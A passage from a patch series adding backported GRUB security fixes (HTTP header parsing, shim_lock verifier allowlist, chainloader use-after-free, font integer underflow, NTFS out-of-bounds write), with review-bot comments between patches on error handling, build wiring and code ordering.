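+ 1 file changed, 9 insertions(+), 3 deletions(-)
+
+diff --git a/grub-core/net/http.c b/grub-core/net/http.c
+index 5aa4ad3..a220d21 100644
+--- a/grub-core/net/http.c
++++ b/grub-core/net/http.c
+@@ -68,7 +68,15 @@ parse_line (grub_file_t file, http_data_t data, char *ptr, grub_size_t len)
+ char *end = ptr + len;
+ while (end > ptr && *(end - 1) == '\r')
+ end--;
++
++ /* LF without CR. */
++ if (end == ptr + len)
++ {
++ data->errmsg = grub_strdup (_("invalid HTTP header - LF without CR"));
++ return GRUB_ERR_NONE;
++ }
+ *end = 0;
++
+ /* Trailing CRLF. */
+ if (data->in_chunk_len == 1)
+ {
+@@ -190,9 +198,7 @@ http_receive (grub_net_tcp_socket_t sock __attribute__ ((unused)),
+ int have_line = 1;
+ char *t;
+ ptr = grub_memchr (nb->data, '\n', nb->tail - nb->data);
+- if (ptr)
+- ptr++;
+- else
++ if (ptr == NULL)
+ {
+ have_line = 0;
+ ptr = (char *) nb->tail;
+--
+2.25.1
+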
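Review bot: In the new LF-without-CR branch of parse_line the result of `grub_strdup ()` is stored in `data->errmsg` unchecked and the function returns `GRUB_ERR_NONE`. If the allocation fails, the malformed header is neither reported nor marked, and the caller presumably carries on as if the line had parsed; how errmsg is consumed is outside the hunk. I would add `if (data->errmsg == NULL) return grub_errno;` right after the assignment. The rewritten branch in http_receive also relies on parse_line now receiving a length that excludes the LF, which is worth stating next to `if (ptr == NULL)`. Unlike the sibling backports, this patch header carries no upstream Signed-off-by or Reviewed-by trailers, so its provenance rests on the Upstream-Status link alone.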
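--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28735.patch
@@ -0,0 +1,271 @@
+From 6fe755c5c07bb386fda58306bfd19e4a1c974c53 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Thu, 2 Dec 2021 15:03:53 +0100
+Subject: kern/efi/sb: Reject non-kernel files in the shim_lock verifier
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=6fe755c5c07bb386fda58306bfd19e4a1c974c53]
+CVE: CVE-2022-28735
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+We must not allow other verifiers to pass things like the GRUB modules.
+Instead of maintaining a blocklist, maintain an allowlist of things
+that we do not care about.
+
+This allowlist really should be made reusable, and shared by the
+lockdown verifier, but this is the minimal patch addressing
+security concerns where the TPM verifier was able to mark modules
+as verified (or the OpenPGP verifier for that matter), when it
+should not do so on shim-powered secure boot systems.
+
+Fixes: CVE-2022-28735
+
+Signed-off-by: Julian Andres Klode <julian.klode@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/kern/efi/sb.c | 221 ++++++++++++++++++++++++++++++++++++++++
+ include/grub/verify.h | 1 +
+ 2 files changed, 222 insertions(+)
+ create mode 100644 grub-core/kern/efi/sb.c
+
+diff --git a/grub-core/kern/efi/sb.c b/grub-core/kern/efi/sb.c
+new file mode 100644
+index 0000000..89c4bb3
+--- /dev/null
++++ b/grub-core/kern/efi/sb.c
+@@ -0,0 +1,221 @@
++/*
++ * GRUB -- GRand Unified Bootloader
++ * Copyright (C) 2020 Free Software Foundation, Inc.
++ *
++ * GRUB is free software: you can redistribute it and/or modify
++ * it under the terms of the GNU General Public License as published by
++ * the Free Software Foundation, either version 3 of the License, or
++ * (at your option) any later version.
++ *
++ * GRUB is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
++ * GNU General Public License for more details.
++ *
++ * You should have received a copy of the GNU General Public License
++ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
++ *
++ * UEFI Secure Boot related checkings.
++ */
++
++#include <grub/efi/efi.h>
++#include <grub/efi/pe32.h>
++#include <grub/efi/sb.h>
++#include <grub/env.h>
++#include <grub/err.h>
++#include <grub/file.h>
++#include <grub/i386/linux.h>
++#include <grub/kernel.h>
++#include <grub/mm.h>
++#include <grub/types.h>
++#include <grub/verify.h>
++
++static grub_efi_guid_t shim_lock_guid = GRUB_EFI_SHIM_LOCK_GUID;
++
++/*
++ * Determine whether we're in secure boot mode.
++ *
++ * Please keep the logic in sync with the Linux kernel,
++ * drivers/firmware/efi/libstub/secureboot.c:efi_get_secureboot().
++ */
++grub_uint8_t
++grub_efi_get_secureboot (void)
++{
++ static grub_efi_guid_t efi_variable_guid = GRUB_EFI_GLOBAL_VARIABLE_GUID;
++ grub_efi_status_t status;
++ grub_efi_uint32_t attr = 0;
++ grub_size_t size = 0;
++ grub_uint8_t *secboot = NULL;
++ grub_uint8_t *setupmode = NULL;
++ grub_uint8_t *moksbstate = NULL;
++ grub_uint8_t secureboot = GRUB_EFI_SECUREBOOT_MODE_UNKNOWN;
++ const char *secureboot_str = "UNKNOWN";
++
++ status = grub_efi_get_variable ("SecureBoot", &efi_variable_guid,
++ &size, (void **) &secboot);
++
++ if (status == GRUB_EFI_NOT_FOUND)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ if (status != GRUB_EFI_SUCCESS)
++ goto out;
++
++ status = grub_efi_get_variable ("SetupMode", &efi_variable_guid,
++ &size, (void **) &setupmode);
++
++ if (status != GRUB_EFI_SUCCESS)
++ goto out;
++
++ if ((*secboot == 0) || (*setupmode == 1))
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ /*
++ * See if a user has put the shim into insecure mode. If so, and if the
++ * variable doesn't have the runtime attribute set, we might as well
++ * honor that.
++ */
++ status = grub_efi_get_variable_with_attributes ("MokSBState", &shim_lock_guid,
++ &size, (void **) &moksbstate, &attr);
++
++ /* If it fails, we don't care why. Default to secure. */
++ if (status != GRUB_EFI_SUCCESS)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++ goto out;
++ }
++
++ if (!(attr & GRUB_EFI_VARIABLE_RUNTIME_ACCESS) && *moksbstate == 1)
++ {
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_DISABLED;
++ goto out;
++ }
++
++ secureboot = GRUB_EFI_SECUREBOOT_MODE_ENABLED;
++
++ out:
++ grub_free (moksbstate);
++ grub_free (setupmode);
++ grub_free (secboot);
++
++ if (secureboot == GRUB_EFI_SECUREBOOT_MODE_DISABLED)
++ secureboot_str = "Disabled";
++ else if (secureboot == GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++ secureboot_str = "Enabled";
++
++ grub_dprintf ("efi", "UEFI Secure Boot state: %s\n", secureboot_str);
++
++ return secureboot;
++}
++
++static grub_err_t
++shim_lock_verifier_init (grub_file_t io __attribute__ ((unused)),
++ enum grub_file_type type,
++ void **context __attribute__ ((unused)),
++ enum grub_verify_flags *flags)
++{
++ *flags = GRUB_VERIFY_FLAGS_NONE;
++
++ switch (type & GRUB_FILE_TYPE_MASK)
++ {
++ /* Files we check. */
++ case GRUB_FILE_TYPE_LINUX_KERNEL:
++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL:
++ case GRUB_FILE_TYPE_BSD_KERNEL:
++ case GRUB_FILE_TYPE_XNU_KERNEL:
++ case GRUB_FILE_TYPE_PLAN9_KERNEL:
++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE:
++ *flags = GRUB_VERIFY_FLAGS_SINGLE_CHUNK;
++ return GRUB_ERR_NONE;
++
++ /* Files that do not affect secureboot state. */
++ case GRUB_FILE_TYPE_NONE:
++ case GRUB_FILE_TYPE_LOOPBACK:
++ case GRUB_FILE_TYPE_LINUX_INITRD:
++ case GRUB_FILE_TYPE_OPENBSD_RAMDISK:
++ case GRUB_FILE_TYPE_XNU_RAMDISK:
++ case GRUB_FILE_TYPE_SIGNATURE:
++ case GRUB_FILE_TYPE_PUBLIC_KEY:
++ case GRUB_FILE_TYPE_PUBLIC_KEY_TRUST:
++ case GRUB_FILE_TYPE_PRINT_BLOCKLIST:
++ case GRUB_FILE_TYPE_TESTLOAD:
++ case GRUB_FILE_TYPE_GET_SIZE:
++ case GRUB_FILE_TYPE_FONT:
++ case GRUB_FILE_TYPE_ZFS_ENCRYPTION_KEY:
++ case GRUB_FILE_TYPE_CAT:
++ case GRUB_FILE_TYPE_HEXCAT:
++ case GRUB_FILE_TYPE_CMP:
++ case GRUB_FILE_TYPE_HASHLIST:
++ case GRUB_FILE_TYPE_TO_HASH:
++ case GRUB_FILE_TYPE_KEYBOARD_LAYOUT:
++ case GRUB_FILE_TYPE_PIXMAP:
++ case GRUB_FILE_TYPE_GRUB_MODULE_LIST:
++ case GRUB_FILE_TYPE_CONFIG:
++ case GRUB_FILE_TYPE_THEME:
++ case GRUB_FILE_TYPE_GETTEXT_CATALOG:
++ case GRUB_FILE_TYPE_FS_SEARCH:
++ case GRUB_FILE_TYPE_LOADENV:
++ case GRUB_FILE_TYPE_SAVEENV:
++ case GRUB_FILE_TYPE_VERIFY_SIGNATURE:
++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION;
++ return GRUB_ERR_NONE;
++
++ /* Other files. */
++ default:
++ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("prohibited by secure boot policy"));
++ }
++}
++
++static grub_err_t
++shim_lock_verifier_write (void *context __attribute__ ((unused)), void *buf, grub_size_t size)
++{
++ grub_efi_shim_lock_protocol_t *sl = grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++ if (!sl)
++ return grub_error (GRUB_ERR_ACCESS_DENIED, N_("shim_lock protocol not found"));
++
++ if (sl->verify (buf, size) != GRUB_EFI_SUCCESS)
++ return grub_error (GRUB_ERR_BAD_SIGNATURE, N_("bad shim signature"));
++
++ return GRUB_ERR_NONE;
++}
++
++struct grub_file_verifier shim_lock_verifier =
++ {
++ .name = "shim_lock_verifier",
++ .init = shim_lock_verifier_init,
++ .write = shim_lock_verifier_write
++ };
++
++void
++grub_shim_lock_verifier_setup (void)
++{
++ struct grub_module_header *header;
++ grub_efi_shim_lock_protocol_t *sl =
++ grub_efi_locate_protocol (&shim_lock_guid, 0);
++
++ /* shim_lock is missing, check if GRUB image is built with --disable-shim-lock. */
++ if (!sl)
++ {
++ FOR_MODULES (header)
++ {
++ if (header->type == OBJ_TYPE_DISABLE_SHIM_LOCK)
++ return;
++ }
++ }
++
++ /* Secure Boot is off. Do not load shim_lock. */
++ if (grub_efi_get_secureboot () != GRUB_EFI_SECUREBOOT_MODE_ENABLED)
++ return;
++
++ /* Enforce shim_lock_verifier. */
++ grub_verifier_register (&shim_lock_verifier);
++
++ grub_env_set ("shim_lock", "y");
++ grub_env_export ("shim_lock");
++}
+diff --git a/include/grub/verify.h b/include/grub/verify.h
+index cd129c3..672ae16 100644
+--- a/include/grub/verify.h
++++ b/include/grub/verify.h
+@@ -24,6 +24,7 @@
+
+ enum grub_verify_flags
+ {
++ GRUB_VERIFY_FLAGS_NONE = 0,
+ GRUB_VERIFY_FLAGS_SKIP_VERIFICATION = 1,
+ GRUB_VERIFY_FLAGS_SINGLE_CHUNK = 2,
+ /* Defer verification to another authority. */
+--
+2.25.1
+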
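Review bot: This backport creates grub-core/kern/efi/sb.c as a new file, but its diffstat lists only sb.c and include/grub/verify.h, so nothing here wires the file into the build. No build-definition change adds sb.c to the image, `<grub/efi/sb.h>` is included but not created, and nothing in the patch calls `grub_shim_lock_verifier_setup ()`. Unless other patches in the recipe supply those pieces, the allowlist in shim_lock_verifier_init is either never compiled or never registered, while the `CVE: CVE-2022-28735` tag still reports the issue as patched to tools that read it. I would confirm with a build that the verifier symbol ends up in the EFI image and record the prerequisite in the patch header, e.g. `Depends-on: <patch adding grub/efi/sb.h and the build entry for sb.c>` (placeholder name). In grub_efi_get_secureboot, `*secboot`, `*setupmode` and `*moksbstate` are dereferenced without checking the returned `size`, which deserves a comment or a guard if the variable getters can succeed with an empty value.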
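--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28736.patch
@@ -0,0 +1,275 @@
+From 431a111c60095fc973d83fe9209f26f29ce78784 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 11:17:17 +0530
+Subject: [PATCH] CVE-2022-28736
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=04c86e0bb7b58fc2f913f798cdb18934933e532d]
+CVE: CVE-2022-28736
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+loader/efi/chainloader: Use grub_loader_set_ex()
+
+This ports the EFI chainloader to use grub_loader_set_ex() in order to fix
+a use-after-free bug that occurs when grub_cmd_chainloader() is executed
+more than once before a boot attempt is performed.
+
+Fixes: CVE-2022-28736
+
+Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/commands/boot.c | 66 ++++++++++++++++++++++++++----
+ grub-core/loader/efi/chainloader.c | 46 +++++++++++----------
+ include/grub/loader.h | 5 +++
+ 3 files changed, 87 insertions(+), 30 deletions(-)
+
+diff --git a/grub-core/commands/boot.c b/grub-core/commands/boot.c
+index bbca81e..6151478 100644
+--- a/grub-core/commands/boot.c
++++ b/grub-core/commands/boot.c
+@@ -27,10 +27,20 @@
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+-static grub_err_t (*grub_loader_boot_func) (void);
+-static grub_err_t (*grub_loader_unload_func) (void);
++static grub_err_t (*grub_loader_boot_func) (void *context);
++static grub_err_t (*grub_loader_unload_func) (void *context);
++static void *grub_loader_context;
+ static int grub_loader_flags;
+
++struct grub_simple_loader_hooks
++{
++ grub_err_t (*boot) (void);
++ grub_err_t (*unload) (void);
++};
++
++/* Don't heap allocate this to avoid making grub_loader_set() fallible. */
++static struct grub_simple_loader_hooks simple_loader_hooks;
++
+ struct grub_preboot
+ {
+ grub_err_t (*preboot_func) (int);
+@@ -44,6 +54,29 @@ static int grub_loader_loaded;
+ static struct grub_preboot *preboots_head = 0,
+ *preboots_tail = 0;
+
++static grub_err_t
++grub_simple_boot_hook (void *context)
++{
++ struct grub_simple_loader_hooks *hooks;
++
++ hooks = (struct grub_simple_loader_hooks *) context;
++ return hooks->boot ();
++}
++
++static grub_err_t
++grub_simple_unload_hook (void *context)
++{
++ struct grub_simple_loader_hooks *hooks;
++ grub_err_t ret;
++
++ hooks = (struct grub_simple_loader_hooks *) context;
++
++ ret = hooks->unload ();
++ grub_memset (hooks, 0, sizeof (*hooks));
++
++ return ret;
++}
++
+ int
+ grub_loader_is_loaded (void)
+ {
+@@ -110,28 +143,45 @@ grub_loader_unregister_preboot_hook (struct grub_preboot *hnd)
+ }
+
+ void
+-grub_loader_set (grub_err_t (*boot) (void),
+- grub_err_t (*unload) (void),
+- int flags)
++grub_loader_set_ex (grub_err_t (*boot) (void *context),
++ grub_err_t (*unload) (void *context),
++ void *context,
++ int flags)
+ {
+ if (grub_loader_loaded && grub_loader_unload_func)
+- grub_loader_unload_func ();
++ grub_loader_unload_func (grub_loader_context);
+
+ grub_loader_boot_func = boot;
+ grub_loader_unload_func = unload;
++ grub_loader_context = context;
+ grub_loader_flags = flags;
+
+ grub_loader_loaded = 1;
+ }
+
++void
++grub_loader_set (grub_err_t (*boot) (void),
++ grub_err_t (*unload) (void),
++ int flags)
++{
++ grub_loader_set_ex (grub_simple_boot_hook,
++ grub_simple_unload_hook,
++ &simple_loader_hooks,
++ flags);
++
++ simple_loader_hooks.boot = boot;
++ simple_loader_hooks.unload = unload;
++}
++
+ void
+ grub_loader_unset(void)
+ {
+ if (grub_loader_loaded && grub_loader_unload_func)
+- grub_loader_unload_func ();
++ grub_loader_unload_func (grub_loader_context);
+
+ grub_loader_boot_func = 0;
+ grub_loader_unload_func = 0;
++ grub_loader_context = 0;
+
+ grub_loader_loaded = 0;
+ }
+@@ -158,7 +208,7 @@ grub_loader_boot (void)
+ return err;
+ }
+ }
+- err = (grub_loader_boot_func) ();
++ err = (grub_loader_boot_func) (grub_loader_context);
+
+ for (cur = preboots_tail; cur; cur = cur->prev)
+ if (! err)
+diff --git a/grub-core/loader/efi/chainloader.c b/grub-core/loader/efi/chainloader.c
+index a8d7b91..93a028a 100644
+--- a/grub-core/loader/efi/chainloader.c
++++ b/grub-core/loader/efi/chainloader.c
+@@ -44,33 +44,28 @@ GRUB_MOD_LICENSE ("GPLv3+");
+
+ static grub_dl_t my_mod;
+
+-static grub_efi_physical_address_t address;
+-static grub_efi_uintn_t pages;
+-static grub_efi_device_path_t *file_path;
+-static grub_efi_handle_t image_handle;
+-static grub_efi_char16_t *cmdline;
+-
+ static grub_err_t
+-grub_chainloader_unload (void)
++grub_chainloader_unload (void *context)
+ {
++ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
++ grub_efi_loaded_image_t *loaded_image;
+ grub_efi_boot_services_t *b;
+
++ loaded_image = grub_efi_get_loaded_image (image_handle);
++ if (loaded_image != NULL)
++ grub_free (loaded_image->load_options);
++
+ b = grub_efi_system_table->boot_services;
+ efi_call_1 (b->unload_image, image_handle);
+- efi_call_2 (b->free_pages, address, pages);
+-
+- grub_free (file_path);
+- grub_free (cmdline);
+- cmdline = 0;
+- file_path = 0;
+
+ grub_dl_unref (my_mod);
+ return GRUB_ERR_NONE;
+ }
+
+ static grub_err_t
+-grub_chainloader_boot (void)
++grub_chainloader_boot (void *context)
+ {
++ grub_efi_handle_t image_handle = (grub_efi_handle_t) context;
+ grub_efi_boot_services_t *b;
+ grub_efi_status_t status;
+ grub_efi_uintn_t exit_data_size;
+@@ -139,7 +134,7 @@ make_file_path (grub_efi_device_path_t *dp, const char *filename)
+ char *dir_start;
+ char *dir_end;
+ grub_size_t size;
+- grub_efi_device_path_t *d;
++ grub_efi_device_path_t *d, *file_path;
+
+ dir_start = grub_strchr (filename, ')');
+ if (! dir_start)
+@@ -215,11 +210,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ grub_efi_status_t status;
+ grub_efi_boot_services_t *b;
+ grub_device_t dev = 0;
+- grub_efi_device_path_t *dp = 0;
++ grub_efi_device_path_t *dp = NULL, *file_path = NULL;
+ grub_efi_loaded_image_t *loaded_image;
+ char *filename;
+ void *boot_image = 0;
+ grub_efi_handle_t dev_handle = 0;
++ grub_efi_physical_address_t address = 0;
++ grub_efi_uintn_t pages = 0;
++ grub_efi_char16_t *cmdline = NULL;
++ grub_efi_handle_t image_handle = NULL;
+
+ if (argc == 0)
+ return grub_error (GRUB_ERR_BAD_ARGUMENT, N_("filename expected"));
+@@ -227,11 +226,6 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+
+ grub_dl_ref (my_mod);
+
+- /* Initialize some global variables. */
+- address = 0;
+- image_handle = 0;
+- file_path = 0;
+-
+ b = grub_efi_system_table->boot_services;
+
+ file = grub_file_open (filename, GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE);
+@@ -401,7 +395,11 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ grub_file_close (file);
+ grub_device_close (dev);
+
+- grub_loader_set (grub_chainloader_boot, grub_chainloader_unload, 0);
++ /* We're finished with the source image buffer and file path now. */
++ efi_call_2 (b->free_pages, address, pages);
++ grub_free (file_path);
++
++ grub_loader_set_ex (grub_chainloader_boot, grub_chainloader_unload, image_handle, 0);
+ return 0;
+
+ fail:
+@@ -412,11 +410,15 @@ grub_cmd_chainloader (grub_command_t cmd __attribute__ ((unused)),
+ if (file)
+ grub_file_close (file);
+
++ grub_free (cmdline);
+ grub_free (file_path);
+
+ if (address)
+ efi_call_2 (b->free_pages, address, pages);
+
++ if (image_handle != NULL)
++ efi_call_1 (b->unload_image, image_handle);
++
+ grub_dl_unref (my_mod);
+
+ return grub_errno;
+diff --git a/include/grub/loader.h b/include/grub/loader.h
+index 7f82a49..3071a50 100644
+--- a/include/grub/loader.h
++++ b/include/grub/loader.h
+@@ -39,6 +39,11 @@ void EXPORT_FUNC (grub_loader_set) (grub_err_t (*boot) (void),
+ grub_err_t (*unload) (void),
+ int flags);
+
++void EXPORT_FUNC (grub_loader_set_ex) (grub_err_t (*boot) (void *context),
++ grub_err_t (*unload) (void *context),
++ void *context,
++ int flags);
++
+ /* Unset current loader, if any. */
+ void EXPORT_FUNC (grub_loader_unset) (void);
+
+--
+2.25.1
+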
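Review bot: In the new `grub_loader_set()` wrapper in grub-core/commands/boot.c, `simple_loader_hooks.boot` and `simple_loader_hooks.unload` are assigned only after the call to `grub_loader_set_ex()`, and nothing in the code says why. The order is load-bearing: `grub_loader_set_ex()` first runs the previous loader's unload callback, and when that is `grub_simple_unload_hook` it clears `simple_loader_hooks` with `grub_memset`, so storing the new pointers before the call would have them wiped. I would put a comment above the two assignments, `/* Set after grub_loader_set_ex(): unloading a previous simple loader zeroes simple_loader_hooks. */`, so a later cleanup does not reorder them.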
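--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-3775.patch
@@ -0,0 +1,97 @@
+From fdbe7209152ad6f09a1166f64f162017f2145ba3 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Mon, 24 Oct 2022 08:05:35 +0800
+Subject: [PATCH] font: Fix an integer underflow in blit_comb()
+
+The expression (ctx.bounds.height - combining_glyphs[i]->height) / 2 may
+evaluate to a very big invalid value even if both ctx.bounds.height and
+combining_glyphs[i]->height are small integers. For example, if
+ctx.bounds.height is 10 and combining_glyphs[i]->height is 12, this
+expression evaluates to 2147483647 (expected -1). This is because
+coordinates are allowed to be negative but ctx.bounds.height is an
+unsigned int. So, the subtraction operates on unsigned ints and
+underflows to a very big value. The division makes things even worse.
+The quotient is still an invalid value even if converted back to int.
+
+This patch fixes the problem by casting ctx.bounds.height to int. As
+a result the subtraction will operate on int and grub_uint16_t which
+will be promoted to an int. So, the underflow will no longer happen. Other
+uses of ctx.bounds.height (and ctx.bounds.width) are also casted to int,
+to ensure coordinates are always calculated on signed integers.
+
+Fixes: CVE-2022-3775
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=992c06191babc1e109caf40d6a07ec6fdef427af]
+CVE: CVE-2022-3775
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 16 ++++++++--------
+ 1 file changed, 8 insertions(+), 8 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index f110db9..3b76b22 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1200,12 +1200,12 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ ctx.bounds.height = main_glyph->height;
+
+ above_rightx = main_glyph->offset_x + main_glyph->width;
+- above_righty = ctx.bounds.y + ctx.bounds.height;
++ above_righty = ctx.bounds.y + (int) ctx.bounds.height;
+
+ above_leftx = main_glyph->offset_x;
+- above_lefty = ctx.bounds.y + ctx.bounds.height;
++ above_lefty = ctx.bounds.y + (int) ctx.bounds.height;
+
+- below_rightx = ctx.bounds.x + ctx.bounds.width;
++ below_rightx = ctx.bounds.x + (int) ctx.bounds.width;
+ below_righty = ctx.bounds.y;
+
+ comb = grub_unicode_get_comb (glyph_id);
+@@ -1218,7 +1218,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+
+ if (!combining_glyphs[i])
+ continue;
+- targetx = (ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
++ targetx = ((int) ctx.bounds.width - combining_glyphs[i]->width) / 2 + ctx.bounds.x;
+ /* CGJ is to avoid diacritics reordering. */
+ if (comb[i].code
+ == GRUB_UNICODE_COMBINING_GRAPHEME_JOINER)
+@@ -1228,8 +1228,8 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ case GRUB_UNICODE_COMB_OVERLAY:
+ do_blit (combining_glyphs[i],
+ targetx,
+- (ctx.bounds.height - combining_glyphs[i]->height) / 2
+- - (ctx.bounds.height + ctx.bounds.y), &ctx);
++ ((int) ctx.bounds.height - combining_glyphs[i]->height) / 2
++ - ((int) ctx.bounds.height + ctx.bounds.y), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+ break;
+@@ -1302,7 +1302,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+ /* Fallthrough. */
+ case GRUB_UNICODE_STACK_ATTACHED_ABOVE:
+ do_blit (combining_glyphs[i], targetx,
+- -(ctx.bounds.height + ctx.bounds.y + space
++ -((int) ctx.bounds.height + ctx.bounds.y + space
+ + combining_glyphs[i]->height), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+@@ -1310,7 +1310,7 @@ blit_comb (const struct grub_unicode_glyph *glyph_id,
+
+ case GRUB_UNICODE_COMB_HEBREW_DAGESH:
+ do_blit (combining_glyphs[i], targetx,
+- -(ctx.bounds.height / 2 + ctx.bounds.y
++ -((int) ctx.bounds.height / 2 + ctx.bounds.y
+ + combining_glyphs[i]->height / 2), &ctx);
+ if (min_devwidth < combining_glyphs[i]->width)
+ min_devwidth = combining_glyphs[i]->width;
+--
+2.25.1
+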
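Review bot: The eight `(int)` casts added across `blit_comb()` have no comment, so the reason for them lives only in the patch description and a later cleanup could drop one as redundant. In the `GRUB_UNICODE_COMB_HEBREW_DAGESH` case, `(int) ctx.bounds.height / 2` casts before dividing, which is correct but easy to misread as a cast of the quotient. I would add one comment at the first use, `/* bounds.width/height are unsigned; cast to int so coordinate arithmetic may go negative. */`, or take signed local copies of the two fields once and use those. `blit_comb()` begins and ends outside these hunks.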
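--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2023-4692.patch
@@ -0,0 +1,97 @@
+From 43651027d24e62a7a463254165e1e46e42aecdea Mon Sep 17 00:00:00 2001
+From: Maxim Suhanov <dfirblog@gmail.com>
+Date: Mon, 28 Aug 2023 16:31:57 +0300
+Subject: [PATCH] fs/ntfs: Fix an OOB write when parsing the $ATTRIBUTE_LIST
+ attribute for the $MFT file
+
+When parsing an extremely fragmented $MFT file, i.e., the file described
+using the $ATTRIBUTE_LIST attribute, current NTFS code will reuse a buffer
+containing bytes read from the underlying drive to store sector numbers,
+which are consumed later to read data from these sectors into another buffer.
+
+These sectors numbers, two 32-bit integers, are always stored at predefined
+offsets, 0x10 and 0x14, relative to first byte of the selected entry within
+the $ATTRIBUTE_LIST attribute. Usually, this won't cause any problem.
+
+However, when parsing a specially-crafted file system image, this may cause
+the NTFS code to write these integers beyond the buffer boundary, likely
+causing the GRUB memory allocator to misbehave or fail. These integers contain
+values which are controlled by on-disk structures of the NTFS file system.
+
+Such modification and resulting misbehavior may touch a memory range not
+assigned to the GRUB and owned by firmware or another EFI application/driver.
+
+This fix introduces checks to ensure that these sector numbers are never
+written beyond the boundary.
+
+Fixes: CVE-2023-4692
+
+Reported-by: Maxim Suhanov <dfirblog@gmail.com>
+Signed-off-by: Maxim Suhanov <dfirblog@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=43651027d24e62a7a463254165e1e46e42aecdea]
+CVE: CVE-2023-4692
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/fs/ntfs.c | 18 +++++++++++++++++-
+ 1 file changed, 17 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/fs/ntfs.c b/grub-core/fs/ntfs.c
+index 2f34f76..c8d3683 100644
+--- a/grub-core/fs/ntfs.c
++++ b/grub-core/fs/ntfs.c
+@@ -184,7 +184,7 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ if (at->attr_end)
+ {
+- grub_uint8_t *pa;
++ grub_uint8_t *pa, *pa_end;
+
+ at->emft_buf = grub_malloc (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ if (at->emft_buf == NULL)
+@@ -209,11 +209,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ }
+ at->attr_nxt = at->edat_buf;
+ at->attr_end = at->edat_buf + u32at (pa, 0x30);
++ pa_end = at->edat_buf + n;
+ }
+ else
+ {
+ at->attr_nxt = at->attr_end + u16at (pa, 0x14);
+ at->attr_end = at->attr_end + u32at (pa, 4);
++ pa_end = at->mft->buf + (at->mft->data->mft_size << GRUB_NTFS_BLK_SHR);
+ }
+ at->flags |= GRUB_NTFS_AF_ALST;
+ while (at->attr_nxt < at->attr_end)
+@@ -230,6 +232,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ at->flags |= GRUB_NTFS_AF_GPOS;
+ at->attr_cur = at->attr_nxt;
+ pa = at->attr_cur;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
+ grub_set_unaligned32 ((char *) pa + 0x10,
+ grub_cpu_to_le32 (at->mft->data->mft_start));
+ grub_set_unaligned32 ((char *) pa + 0x14,
+@@ -240,6 +249,13 @@ find_attr (struct grub_ntfs_attr *at, grub_uint8_t attr)
+ {
+ if (*pa != attr)
+ break;
++
++ if ((pa >= pa_end) || (pa_end - pa < 0x18))
++ {
++ grub_error (GRUB_ERR_BAD_FS, "can\'t parse attribute list");
++ return NULL;
++ }
++
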